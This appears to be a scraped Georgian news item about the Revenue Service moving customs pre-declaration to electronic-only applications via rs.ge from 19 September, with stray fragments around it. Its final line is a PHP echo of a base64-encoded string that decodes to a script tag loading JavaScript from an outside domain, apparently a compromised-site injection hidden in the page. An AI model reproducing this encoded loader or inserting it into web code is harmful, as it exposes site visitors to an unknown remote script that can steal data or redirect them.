celsiusi
ავერსი საქკაბელი
ფინანსთა სამინისტროს შემოსავლების სამსახურის ინფორმაციით, მიმდინარე წლის 19 სექტემბრიდან იზღუდება, (აღარ განხორციელდება) წინასწარი დეკლარირების მიზნით, საბაჟო პროცედურის (გარდა თავისუფალი ზონის პროცედურისა) განსაზღვრისთვის დოკუმენტების მატერიალური ფორმით მიღება (გაფორმების ეკონომიკურ ზონებში ვიზიტით).
 
მათივე ცნობით, წინასწარი დეკლარირება, საქართველოს საბაჟო ტერიტორიაზე შემოსატან და საქართველოს საბაჟო ტერიტორიიდან გასატან საქონელზე, საბაჟო ორგანოს მიერ განხორციელდება მხოლოდ ელექტრონული მიმართვით, შემოსავლების სამსახურის ოფიციალური ვებგვერდის www.rs.ge ავტორიზებული მომხმარებლის მეშვეობით, განცხადების წარდგენის საფუძველზე.
 
„აღნიშნული ცვლილების შესახებ, საერთაშორისო ვაჭრობაში ჩართულ პირთა ინფორმირება უკვე  განხორციელდა ავტორიზებული მომხმარებლის გვერდის საშუალებით, პირად შეტყობინებებში ინფორმაციის მიწოდებით“, – აღნიშნავენ შემოსავლების სამსახურში.
 
დამატებითი ინფორმაცია და ვიდეოსახელმძღვანელო ელექტრონული განაცხადის შევსების წესის შესახებ მოცემულია შემდეგ ბმულებზე: დისტანციურად განცხადების წარდგენის ინსტრუქცია; ელექტრონულად გამოგზავნილი დოკუმენტების საფუძველზე დეკლარაციის შევსების მოთხოვნა; წინასწარი დეკლარირება იმპორტი.
417
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");